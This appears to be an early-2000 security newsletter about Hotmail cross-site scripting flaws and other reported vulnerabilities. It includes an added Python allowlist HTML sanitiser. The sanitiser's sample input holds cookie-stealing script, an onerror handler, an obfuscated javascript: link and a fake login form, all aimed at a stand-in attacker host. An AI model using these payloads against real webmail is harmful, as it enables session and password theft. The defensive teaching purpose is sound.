Hello and welcome,
This is the first issue of the SecuritySearch.Net Vulnerability Report. In this newsletter you will find
the Vulnerability of the Week, the Top 5 Vulnerabilities reported this Week, the Top 5 Security News
stories this Week, and the Sites added to SecuritySearch.net this Week. We hope you enjoy this
newsletter. If you like it, or have any suggestions for improvement, we'd be happy to hear from you!
=================================================================
Sponsored by VeriSign - The Internet Trust Company
=================================================================
Protect your servers with 128-bit SSL encryption!
Get VeriSign's FREE guide, "Securing Your Web Site
for Business." You will learn everything you need to
know about using SSL to encrypt your e-commerce transactions
for serious online security. Click here!
http://www.verisign.com/cgi-bin/go.cgi?a=n016005670013000
=================================================================
Vulnerability Of The Week
=========================
HotMail
Three security flaws in Hotmail were discovered this week. All three allow a malicious user to inject
JavaScript code into e-mail messages, so that the script runs in the recipient's browser, inside the
recipient's Hotmail session, when the message is read. The malicious user can then read other users'
messages, send e-mail messages under another user's name and create a fake login screen where a
legitimate user's password could be stolen. These vulnerabilities were discovered by Georgi Guninski:
http://www.nat.bg/~joro/
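The class of bug above is what later came to be called stored cross-site scripting in webmail: the
message body is attacker-controlled HTML, but it is rendered inside the victim's session. The fix on
the server side is not a denylist of "<script>" but an allowlist that rebuilds the markup from scratch,
because event-handler attributes, unknown tags and javascript: URLs are all script vectors. The
following is an added example written for this newsletter, not Hotmail's code and not a reproduction
of Guninski's actual vectors. The tag and attribute allowlists, the function names and the sample
message body are all constructed for illustration.

```python
"""Allowlist-based HTML sanitiser for untrusted e-mail bodies (added example).

Webmail renders attacker-controlled HTML in the victim's browser, inside the
victim's session, so any surviving script runs with that user's cookies.
Rather than hunting for "<script>", this parser keeps only known-safe tags
and attributes, rejects URLs whose scheme is not allowlisted, and re-emits
the markup from scratch with everything else escaped as text.
"""
import html
import re
from html.parser import HTMLParser

# Allowlists are an assumption for this example; a real deployment tunes them.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a",
                "ul", "ol", "li", "blockquote"}
ALLOWED_ATTRS = {"a": {"href"}}
URL_ATTRS = {"href", "src"}
SAFE_URL_SCHEMES = {"http", "https", "mailto"}
VOID_TAGS = {"br"}
# Content of these tags is executable or otherwise not text; drop it entirely.
DROP_CONTENT_TAGS = {"script", "style", "object", "embed", "iframe"}


def safe_url(value):
    """Return a cleaned URL if its scheme is allowlisted (or relative), else None.

    Browsers discard control characters and whitespace before parsing the
    scheme, so "java\\tscript:" is still javascript:. Normalise the same way
    before checking, and return the normalised form so the two agree.
    """
    cleaned = re.sub(r"[\x00-\x20\x7f]", "", value)
    m = re.match(r"^([a-zA-Z][a-zA-Z0-9+.-]*):", cleaned)
    if m is None:
        return cleaned  # relative URL: no scheme, nothing to execute
    return cleaned if m.group(1).lower() in SAFE_URL_SCHEMES else None


class MailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_stack = []   # allowed tags currently open, keeps output balanced
        self.skip_depth = 0    # > 0 while inside a DROP_CONTENT tag

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag in DROP_CONTENT_TAGS:
                self.skip_depth += 1
            return
        if tag in DROP_CONTENT_TAGS:
            self.skip_depth = 1
            return
        if tag not in ALLOWED_TAGS:
            return  # unknown tag dropped; its text content still passes as text
        parts = []
        for name, value in attrs:
            name = name.lower()
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops every on* handler and style along with the rest
            value = value or ""
            if name in URL_ATTRS:
                value = safe_url(value)
                if value is None:
                    continue  # javascript:, data:, etc.: attribute removed
            parts.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(parts)))
        if tag not in VOID_TAGS:
            self.open_stack.append(tag)

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)
        if tag not in VOID_TAGS:
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if self.skip_depth:
            if tag in DROP_CONTENT_TAGS:
                self.skip_depth -= 1
            return
        if tag not in self.open_stack:
            return  # stray close tag for a dropped or never-opened element
        while self.open_stack:  # close anything left open inside this tag too
            opened = self.open_stack.pop()
            self.out.append("</%s>" % opened)
            if opened == tag:
                break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))

    def handle_comment(self, data):
        pass  # comments carried conditional markup in some browsers; drop them

    def result(self):
        while self.open_stack:
            self.out.append("</%s>" % self.open_stack.pop())
        return "".join(self.out)


def sanitize_mail_html(body):
    parser = MailSanitizer()
    parser.feed(body)
    parser.close()
    return parser.result()


# Constructed sample body (not a real Hotmail payload): each fragment is a
# different injection vector that filtering only "<script>" would miss.
SAMPLE_BODY = (
    '<p>Hi, see <a href="http://example.invalid/report">the report</a>.</p>'
    '<script>document.location="http://attacker.invalid/?"+document.cookie</script>'
    '<img src="x" onerror="alert(document.cookie)">'
    '<a href="jAvA&#09;script:alert(1)">click me</a>'
    '<p style="position:absolute;top:0">fake login form here</p>'
    '<form action="http://attacker.invalid/steal">password: <input name=p></form>'
)

if __name__ == "__main__":
    print(sanitize_mail_html(SAMPLE_BODY))
```

Two points worth noting from the sample: the href that spells "javascript" with an encoded tab in the
middle is caught only because the scheme check normalises the value the way a browser does, and the
fake login form disappears because neither form nor input is on the allowlist, so there is nothing for
the attacker to position over the real login screen. A production webmail system would use a maintained
sanitiser library rather than this sketch, but the principle is the same: parse, allowlist, rebuild.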
Top 5 Vulnerabilities this Week
===============================
1. Security Vulnerability in Aserver.
/opt/audio/bin/Aserver can be used to gain root access.
HP: http://us-support.external.hp.com
2. Security Bug Discovered in the userhelper program.
Local users can gain root access.
Red Hat, Inc: http://www.redhat.com/support/errata/RHSA2000001-02.html
3. Intel InBusiness E-mail Station.
Remote users can remove arbitrary files and reconfigure the e-mail station.
Rootshell: http://www.rootshell.com/archive-j457nxiqi3gq59dv/200001/estation.txt.html
4. Malformed IMAP Request.
Remote users can cause services to fail and execute arbitrary code on the server.
Microsoft: http://www.microsoft.com/security/bulletins/ms00-001faq.asp
5. Denial of Service Attack in IMail IMONITOR Server.
Remote users can cause IMail to crash with an "Invalid Memory Address" error.
USSR Labs: http://www.ussrback.com/labs26.html
Top 5 News Stories this Week
============================
** To read URLs that go over two lines, copy and paste the link directly into your web browser and
remove the spaces. **
Democratic National Committee patches security hole -
http://news.cnet.com/news/0-1005-200-1515654.html?tag=st.ne.1002.
Solaris hack attacks on the rise -
http://www.zdnet.com/zdnn/stories/news/0,4586,2417405,00.html?chkpt=zdhpnews01
Attacks on Encryption Code Raise Questions About Computer Vulnerability -
http://www.nytimes.com/library/tech/00/01/biztech/articles/05secu.html
(Registration required)
Intel grapples with security glitch in server -
http://news.cnet.com/news/0-1003-200-1515150.html?tag=st.ne.1002.
New year hack attacks -
http://www.australianit.com.au/common/story_page/0,2405,180269%255E04%252D01
%252D2000%255E,00.html
Sites added to SecuritySearch.net this Week
============================================
Cybernetica Information Security Research - Research in cryptography, fast
implementations, time-stamping, notarization and electronic documents.
http://www.cyber.ee/infosecurity/research/
HiSolutions - HiSolutions provides IT security consulting and professional
security audits. http://www.hisolutions.com/services/index.html
HiSolutions - HiSolutions provides award winning PKI-based encryption
software with SSL-Proxy options. Runs on Windows, Linux and Solaris.
http://www.hisolutions.com/hisecure/index.html
Time-Stamping Client - Time-stamping enables you to mark the time when your
file was in a certain state - be it a text document, video clip, picture or
just about any type of data that can be represented in binary form.
http://www.cyber.ee/tsc/
Sentient Consulting - Sentient Consulting delivers solutions for information
security management and real-time situational awareness. Our clients include
major industrial, financial, government and defence organisations.
http://www.sentient.com.au
Dragon IDS - from Network Security Wizards. A packet based IDS that searches
for over 600 different network attacks at fully saturated 100 Mb/s speeds.
Runs on Linux, OpenBSD, FreeBSD and Solaris. All of the signatures are
completely open and writing new signatures is easy. Dragon collects complete
attack information - raw packet dumps, the response from the server under
attack, and follow-on activity from suspicious hackers. Free demo.
http://www.network-defense.com/
HackerShield - Anti-hacker software that finds and closes the holes that
hackers use to break into servers, workstations and other network devices.
Aimed at systems and network administrators in both larger enterprises and
small/medium workgroups who need to protect their company's assets.
http://www.bindview.com/products/hackershield/index.html
SecuriTeam - Beyond Security will help you expose your security holes and
show you what the bad guys already know about your hosts and network. Use
our Automated Scanning service to perform a full security audit of your
site, and find the latest security news and tools. http://www.SecuriTeam.com
Netlexis - Secure Electronic Commerce Solutions - NetLexis secures
electronic commerce solutions for Windows PCs - authentication, access
control, encryption, policies, PKI and CA integration.
http://www.netlexis.com
Security Products Magazine - Security Products is an industry trade
publication featuring articles on industrial, personal and information
security for the security, fire and safety industries. Each online edition
includes daily industry news, employment resources, an online buyer's guide
and links to government agencies and professional organizations in the
industry. http://www.secprodonline.com
Questions
=========
This is our first Vulnerability Report and we would really appreciate your feedback. If you have any
questions or suggestions please contact us at feedback@securitysearch.net
Subscription
============
To unsubscribe from this newsletter please send an e-mail to vulnerabilityreport@securitysearch.net with
the word "unsubscribe" in the message body.
Copyright SecuritySearch.Net, 2000. All Rights Reserved.